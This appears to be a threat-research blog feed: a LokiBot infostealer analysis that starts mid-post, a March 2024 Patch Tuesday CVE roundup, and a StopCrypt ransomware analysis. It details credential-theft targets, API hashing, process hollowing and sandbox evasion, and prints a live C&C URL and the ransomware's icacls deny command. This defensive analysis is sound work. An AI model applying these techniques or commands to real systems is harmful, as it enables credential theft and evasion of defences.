The decrypted bytes are the string representation of the executable’s hex bytes, and a string-to-hex conversion is performed to finally get the LokiBot executable. The malware executes the LokiBot binary using the CreateProcessW API.

Figure 5: LokiBot binary string representation

LokiBot

LokiBot is an information stealer that has been active in the wild since 2015. It contains a rich list of applications that are used to steal data from the victim’s machine. After sending data to its C&C server, the malware receives commands to perform various actions on the victim’s machine.

Delayed Execution

The execution of LokiBot starts by examining the argument value for space-separated “-u” occurrences. The malware execution has been delayed by 10000 milliseconds for each occurrence of the value “-u”.

Figure 6: Checks process arguments

API Name Hashing

The malware uses API name hashing and resolves addresses just before invoking the APIs. To make the analysis difficult, the malware does not store the resolved API addresses, instead it loads and executes the API address from the accumulator register. If the malware needs to execute the same API more than once, it needs to resolve the API address again to invoke the API.

Hashing Algorithm

Code representation for the hashing module is in the C language and can be seen below. It generates a DWORD hash for the given array of bytes.

Figure 7: Hashing algorithm

Getting the Load Addresses of DLLs

An array of DLL names with a fixed length of 0x1A for each name is created by the malware. To resolve an API address, the malware calls a function with the index of the DLL names array and API name hash. The name of the DLL is retrieved from the DLL names array using the index value. The malware invokes the LoadLibraryW API to get the load address of the DLL, except for the kernel32 and ntdll DLLs. The malware considers kernel32 and ntdll to be already loaded into the memory and does PEB traversal to find the load address. It does this by comparing the DLL name hash with the loaded module name hashes.

Figure 8: Array of DLL names

Figure 9: Gets DLL load address

Resolving APIs Addresses

After getting the DLL load address either by calling the LoadLibraryW API or by PEB traversal, the malware enumerates the export directory of the loaded DLL and compares the requested API name hash with the exported API name hash to resolve the API address.

Single Instance Execution

The malware retrieves the MachineGUID from the registry entry “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography” to compute its MD5 string representation to the 12th byte, which is used as a mutex name. The malware attempts to create the mutex and examines the error value ERROR_ALREADY_EXISTS to terminate the current execution and ensure a single execution of the malware process. The mutex value for my system is “06E1A66DB87D112F02F38F7C” and is expected to always be the same for a given system. It is later sent to the Command and Control (C&C) server. The mutex name can help the malware author identify whether a system is reinfected or has been infected for the first time. Some of the character sequences of the mutex name are used by the malware as dropped file names and a directory name.

Figure 10: Creates mutex using machine GUID

If the malware fails to get the mutex name using MachineGUID, then it executes its backup code to compute a random mutex name using the system time.

Figure 11: Code to create an alternative random mutex

Stealing Application Data

The malware steals data from installed applications like browsers, SSH clients, document applications, password managers, email clients and FTP clients The data it steals includes login credentials, autofill web forms, document texts and more. The malware contains a total of 101 functions to steal data from the installed applications. The malware initializes the array of function pointers with the address of stealing functions and initializes another array with the respective argument values for the stealing functions. The malware invokes the stealing functions in a loop. It invokes them from the array of function pointers with the respective argument from the arguments array. The stealer functions keep the stolen data in a structured buffer along with their sizes.

Figure 12: Calling stealing functions

Browsers

The malware contains a list of chromium-based browsers, gecko-based browsers and other browsers to steal the stored data. For a gecko-based browser, malware reads the registry entry for the respective browser to get the installation directory and sets the installation directory into the environment path variable to smoothly load the nss3.dll which is used to decrypt the gecko-based browsers data. After decrypting the data, malware restores the environment path variable. The malware reads the profiles.ini file from the browser dedicated application data directory to get the list of profile directories. The malware enumerates each profile directory and uses multiple APIs (NSS_Init, GetInternalKeySlot, Authenticate, Decrypt, FreeSlot, FreeItem, CheckUserPassword, NSS_Shutdown) of nss3.dll, to decrypt data from the files mentioned below:

  • json
  • js
  • sqlite
  • txt
  • txt

For chromium-based browsers, the malware steals data from the files “Web Data” and “Login Data” placing them into respective application data folders for the browsers. For Edge and Internet Explorer, the malware steals data from Windows Password Manager and registry entry “Software\Microsoft\Internet Explorer\IntelliForms\Storage2”. The malware enumerates and retrieves credentials from the Windows Password Manager using multiple APIs (VaultEnumerateVaults, VaultOpenVault. VaultEnumerateItems, VaultGetItem, VaultFree, VaultCloseVault) of library vaultcli.dll.

Chromium-basedGecko-basedOthers
DragonMozilla FirefoxSafari
ChromePlusSeaMonkeyOpera Next
ChromeFlockOpera Stable
NichromeBlack HawkQtWeb
RockMeltCyberfoxQupZilla
SparkIceDragonInternet Explorer
ChromiumK-MeleonOpera
Titan BrowserLunascape
TorchPale Moon
YandexBrowserWaterfox
Epic Privacy Browser
CocCoc
Vivaldi
Chromodo
Superbird
Coowon
Mustang Browser
360Browser
Citrio
Chrome SxS
Orbitum
Iridium

Figure 13: List of browsers

Apart from the browsers, the malware steals data from other installed applications which include SSH clients, FTP clients, email applications, document applications, password managers and more, which are mentioned in the table below:

Figure 14: List of applications to steal data

C&C Communication

The malware has an array to contain four C&C server addresses, however, in current variants, only one of the unique and valid C&C server addresses is found. After decrypting the C&C URL, the malware separates the IP address, port number, path and protocol to establish a connection.

Figure 15: Code for C&C communication

The malware compresses the stolen application data using aPLib compression library and appends into the structured buffer. The malware then prepares the HTTP post request with the user-agent “Mozilla/4.08 (Charon; Inferno)” and sends the stolen data to the C&C server. After sending the HTTP post request, the malware keeps the check sum of the data it sent into a file “C:\Users\Deepak\AppData\Roaming\DB87D1\112F02.hdb”. The directory name is taken from the mutex name’s character offsets from seven to 12, and the file name is taken from offsets 12 to 17.

Figure 16: Stolen data sent to the C&C server

An explanation of values sent by the malware to the C&C server is mentioned in the table below:

OffsetSizeField DescriptionValue
002Version12
022Information type27
042IsUnicodeFlag0
064Size of binary ID07
107BinaryIDckav.ru
172IsUnicodeFlag1
194Size of username12
2312UsernameDeepak (Unicode)
352IsUnicodeFlag01
374Size of computer name30
4130Computer nameDESKTOP-HQ11H51 (unicode)
712IsUnicodeFlag01
734Size of computer name30
7730Computer nameDESKTOP-HQ11H51 (unicode)
1074Screen width780
1114Screen height438
1152IsUserAdmin01
1172IsBuiltInAdministrator00
1192PROCESSOR_ARCHITECTURE_AMD6401
1212OS major version10
1232OS minor version00
1252Left over6B
1272Related to service pack version01
1292IsFirstPacketSent00
1312Word value 100
1332Word value 000
1352Word value 000
1372Word value 000
1394Size of stolen data20776
1412IsUnicodeFlag01
1454Size of mutex name30
14948Mutex name06E1A66DB87D112F02F38F7C
1974Size of random string5
2015Random stringytPeE
2064Size of compressed data680
210680Compressed data01 E1 48 01 B0 D9…

Figure 17: Description of the data sent to the C&C

After sending the stolen application data, the malware checks to see if the process is running in administrator mode to steal credentials stored in Windows Credential Manager. The malware enumerates files from the directory “%AppData%\Roaming\Microsoft\Credentials” using the APIs FindFirstFileW and FindNextFileW to read the encrypted data which is decrypted by accessing the process memory of lsass.exe.

Figure 18: Encrypted credentials in Windows Credential Manager

Decrypted credentials are compressed using aPLib compression library and appended into the structured buffer after malware variant-specific information and collected system information. It is then sent to the C&C server.

Figure 19: Decrypted credential from Windows Credential Manager

The malware creates the file “%APPDATA%\Roaming\DB87D1\112F02.lck” before attempting to decrypt credentials from Windows Credential Manager and deletes the files once the decryption routine is completed.

Figure 20: Creating the lock file

After sending the stolen data, the malware expects commands from the C&C server and spawns a separate thread to perform actions based on the received command.

Registry Entry

The malware creates a self-copy in the application data folder using a file move operation. If it fails in moving the file, then the malware uses the file copy operation. The malware creates a registry entry “HKCU\http://91.92.252.146:8015/wioy/five/fre.php\DB87D1” and sets the values as the path of the dropped file.

Figure 21: Registry entry

The malware modifies the attributes of the directory to the following values to lower the visibility:

  • FILE_ATTRIBUTE_HIDDEN
  • FILE_ATTRIBUTE_SYSTEM
  • FILE_ATTRIBUTE_NOT_CONTENT_INDEXED

Figure 22: Modifies directory attributes

The archive file cannot be found in any of the popular threat intelligence sharing portals like VirusTotal and ReversingLabs at the time of writing this blog, which indicates its uniqueness and limited distribution.

Figure 23: File is not available on Virus Total

Evidence of the detection by our RTDMI engine can be seen below in the Capture ATP report for this file.

Figure 24: Capture report

Microsoft Security Bulletin Coverage for March 2024

Overview
Microsoft’s March 2024 Patch Tuesday has 59 vulnerabilities – 26 of which are Elevation of Privilege. SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of March 2024 and has produced coverage for 7 of the reported vulnerabilities.

Vulnerabilities with Detections

CVECVE TitleSignature
CVE-2024-21330Azure Open Management Infrastructure (OMI) Elevation of Privilege VulnerabilityASPY 546 Exploit-py py.MP_4
CVE-2024-21433Windows Print Spooler Elevation of Privilege VulnerabilityASPY 549 Exploit-exe exe.MP_372

IPS 1134 GetCMD.dll File Download (SMB)

CVE-2024-21437Windows Graphics Component Elevation of Privilege VulnerabilityASPY 547 Exploit-exe exe.MP_370
CVE-2024-26160Windows Cloud Files Mini Filter Driver Information Disclosure VulnerabilityASPY 548 Exploit-exe exe.MP_371
CVE-2024-26170Windows Composite Image File System (CimFS) Elevation of Privilege VulnerabilityASPY 552 Exploit-exe exe.MP_374
CVE-2024-26182Windows Kernel Elevation of Privilege VulnerabilityASPY 551 Exploit-exe exe.MP_373
CVE-2024-26185Windows Compressed Folder Tampering VulnerabilityASPY 550 Malformed-7z 7z.MP_1

 

Release Breakdown

The vulnerabilities can be classified into the following categories:

For March there are 57 critical, 2 important and zero moderate vulnerabilities.

2024 Patch Tuesday Monthly Comparison

Microsoft tracks vulnerabilities that are being actively exploited at the time of discovery as well as those that have been disclosed publicly before the Patch Tuesday release for each month. The chart above displays these metrics as seen each month.

Release Detailed Breakdown

Denial of Service Vulnerabilities

CVE-2024-21392.NET and Visual Studio Denial of Service Vulnerability
CVE-2024-21408Windows Hyper-V Denial of Service Vulnerability
CVE-2024-21438Microsoft AllJoyn API Denial of Service Vulnerability
CVE-2024-26181Windows Kernel Denial of Service Vulnerability
CVE-2024-26190Microsoft QUIC Denial of Service Vulnerability
CVE-2024-26197Windows Standards-Based Storage Management Service Denial of Service Vulnerability

 

Elevation of Privilege Vulnerabilities

CVE-2024-21330Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability
CVE-2024-21390Microsoft Authenticator Elevation of Privilege Vulnerability
CVE-2024-21400Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability
CVE-2024-21418Software for Open Networking in the Cloud (SONiC) Elevation of Privilege Vulnerability
CVE-2024-21427Windows Kerberos Security Feature Bypass Vulnerability
CVE-2024-21431Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability
CVE-2024-21432Windows Update Stack Elevation of Privilege Vulnerability
CVE-2024-21433Windows Print Spooler Elevation of Privilege Vulnerability
CVE-2024-21434Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability
CVE-2024-21436Windows Installer Elevation of Privilege Vulnerability
CVE-2024-21437Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2024-21439Windows Telephony Server Elevation of Privilege Vulnerability
CVE-2024-21442Windows USB Print Driver Elevation of Privilege Vulnerability
CVE-2024-21443Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-21445Windows USB Print Driver Elevation of Privilege Vulnerability
CVE-2024-21446NTFS Elevation of Privilege Vulnerability
CVE-2024-26165Visual Studio Code Elevation of Privilege Vulnerability
CVE-2024-26169Windows Error Reporting Service Elevation of Privilege Vulnerability
CVE-2024-26170Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability
CVE-2024-26173Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26176Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26178Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26182Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-26199Microsoft Office Elevation of Privilege Vulnerability
CVE-2024-26201Microsoft Intune Linux Agent Elevation of Privilege Vulnerability
CVE-2024-26203Azure Data Studio Elevation of Privilege Vulnerability

 

Information Disclosure Vulnerabilities

CVE-2024-21448Microsoft Teams for Android Information Disclosure Vulnerability
CVE-2024-26160Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability
CVE-2024-26174Windows Kernel Information Disclosure Vulnerability
CVE-2024-26177Windows Kernel Information Disclosure Vulnerability
CVE-2024-26204Outlook for Android Information Disclosure Vulnerability

 

Remote Code Execution Vulnerabilities

CVE-2024-21334Open Management Infrastructure (OMI) Remote Code Execution Vulnerability
CVE-2024-21407Windows Hyper-V Remote Code Execution Vulnerability
CVE-2024-21411Skype for Consumer Remote Code Execution Vulnerability
CVE-2024-21426Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-21429Windows USB Hub Driver Remote Code Execution Vulnerability
CVE-2024-21430Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability
CVE-2024-21435Windows OLE Remote Code Execution Vulnerability
CVE-2024-21440Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-21441Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21444Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21450Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-21451Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-26159Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-26161Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-26162Microsoft ODBC Driver Remote Code Execution Vulnerability
CVE-2024-26164Microsoft Django Backend for SQL Server Remote Code Execution Vulnerability
CVE-2024-26166Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-26198Microsoft Exchange Server Remote Code Execution Vulnerability

 

Security Feature Bypass Vulnerabilities

CVE-2024-20671Microsoft Defender Security Feature Bypass Vulnerability

 

Spoofing Vulnerabilities

CVE-2024-21419Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2024-21421Azure SDK Spoofing Vulnerability

 

Tampering Vulnerabilities

CVE-2024-26185Windows Compressed Folder Tampering Vulnerability

 

Interesting Multi-Stage StopCrypt Ransomware Variant Propagating in the Wild

Overview

The SonicWall Capture Labs threat research team recently observed an interesting variant of StopCrypt ransomware. The ransomware executes its malicious activities by utilizing multi-stage shellcodes before launching a final payload that contains the file encryption code.

Infection Cycle

At the start of execution, it creates a string of msim32.dll on the stack, and, using LoadLibrary, loads the Dll. The significance of why it is doing this is a mystery, as that is not used in the process.

It has a long, time-delaying loop of 65,18,40,312 iterations wherein the same data is copied to a location and the count is incremented. Many more similar loop-delaying techniques are used throughout the malware execution.

The possible reason for using such techniques is to evade detection. These loops serve a nefarious purpose: to thwart time-sensitive sandboxes and security mechanisms by artificially prolonging the execution time of the malicious code.

Figure 1:  Loop for delaying time

Next, it allocates the memory using LocalAlloc API, and it then uses VirtualProtect to change the permission of the memory block to READ, WRITE and EXECUTE.

First Stage Payload

In this stage, it dynamically resolves the required APIs using the Kernel_GetProcAddress API.

The Ransomware constructs API function calls by constructing the function names or strings containing API names directly on the stack. It does this instead of using straightforward API calls, which can be easily identified and analyzed by security tools.

Figure 2: Constructing API names on the stack

The malware resolves the addresses of the following APIs:

  • GlobalAlloc
  • VirtualAlloc
  • SetLastError
  • Sleep
  • CreateToolHelp32Snapshot
  • Module32First
  • CloseHandle

CreateToolhelp32Snapshot is utilized to take a snapshot of the current process that includes all its modules (0x8 = TH32CS_SNAPMODULE):

Figure 3: Kernel32_ CreateToolhelp32Snapshot Win32 API call

The Ransomware extracts information about the first module of the process using the Module32First API.

It then calls the VirtualAlloc API to allocate the memory with READ, WRITE and EXECUTE permissions.

Second Stage of Payload

In this stage, the primary task of the shellcode is to perform process hollowing.

API function names are also dynamically created on the stack during this phase.

Figure 4: Constructing API names on the stack

The malware resolves the addresses of the following APIs:

  • MessageBoxA
  • GetMessageExtraInfo
  • WinExec
  • CreateFileA
  • WriteFile
  • CloseHandle
  • CreateProcessA
  • GetThreadContext
  • VirtualAlloc
  • VirtualAllocEx
  • VirtualFree
  • ReadProcessMemory
  • WriteProcessMemory
  • SetThreadContext
  • ResumeThread
  • WaitForSingleObject
  • GetModuleFileNameA
  • GetCommandLineA
  • NtUnmapViewOfSection
  • NtWriteVirtualMemory
  • RegisterClassExA
  • CreateWindowExA
  • PostMessageA
  • GetMessageA
  • DefWindowProcA
  • GetFileAttributesA
  • GetStartupInfoA
  • VirtualProtectEx

The Ransomware then checks the FileAttributes of the non-existent file “apfHQ” using the kernel32_GetFileAttributesA API.

Figure 5: Kernel32_GetFileAttributesA Win32 API call

The purpose for this operation is not known – this could be a marker to identify specific systems where the file might be present.

The file then registers a window class called “saodkfnosa9uin” using the user32_RegisterClassExA API.

Figure 6: Kernel32_RegisterClassExA Win32 API call

It then calls user32_CreateWindowExA API to create the window.

The ransomware calls the VirtualAlloc API to allocate the memory with READ, WRITE permissions

to store the path returned by the GetModuleFileNameA API. The path is the current location from where the ransomware is running. Next, it calls the kernel32.GetStartupInfoA API to retrieve startup information.

Figure 7: Kernel32_GetStartupInfoA Win32 API call

Using the kernel32_CreateProcessA API, it launches its own copy as a new process in a suspended state. This is where the process hollowing begins.

Figure 8: Kernel32_CreateProcessA Win32 API call

The GetThreadContext API is called to retrieve the context of a specific thread:

Figure 9: Kernel_ GetThreadContext  Win32 API call

The ReadProcessMemory API is used to get the loaded base address of the image.

The Ntdll_NtUnmapViewOfSection API is used to unmap a view of a section from the virtual address space of the process.

Figure 10: Ntdll_NtUnmapViewOfSection Win32 API call

The VirtualAllocEx API is used to allocate new space in the newly created process.

Figure 11: Kernel32_ VirtualAllocEx Win32 API call

The Ntdll_NtWriteVirtualMemory API is used multiple times to write the data into the memory of the newly created process which is in a suspended state.

Figure 12: Ntdll_NtWriteVirtualMemory Win32 API call

Once the section by section data is written into the memory of the remote suspended process, it calls the Kernel32_SetThreadContext API. The SetThreadContext API  is used to set the context for the remote thread:

Figure 13: Kernel32_SetThreadContext Win32 API call

The ResumeThread API is used to start the execution of the thread process that was in a suspended state.

Final Payload

The ransomware then launches a resumed process with the following parameter: “–Admin IsNotAutoStart IsNotTask.”

Figure 14: Launching process with “–Admin IsNotAutoStart IsNotTask” as a parameter

The ransomware creates a new directory in C:\\Users\<user_name>\AppData\Local and copies the current malware image(binary) into it.

It then launches the “icacls.exe” process, which is the command-line utility used to view and modify access control lists (ACLs) in Windows.

The command icacls.exe <path> /deny “s-1-1-0:(OI)(CI)(DE,DC) is used to deny permissions to a specific security identifier (SID) on a file or directory in Windows.

Overall, this command denies the “Everyone” group permission to delete the specified file or directory and its contents, effectively restricting their ability to modify or delete it.

Figure 15: Using the Icacls command to deny permission for deleting file or directory

The ransomware creates a scheduled task that executes a copy of the final payload with a command line argument –Task, every five minutes.

Figure 16: Task added in the task scheduler.

The ransomware encrypts the files and appends the .msjd extension to the encrypted files.

Figure 17: Ransomware encrypted filenames

The ransomware note is kept in every encrypted folder as _readme.txt

Figure 18: Ransomware note

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: StopCrypt.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

*this blog was originally titled in a way that indicated that this was a new ransomware variant, but this was done in error and has been corrected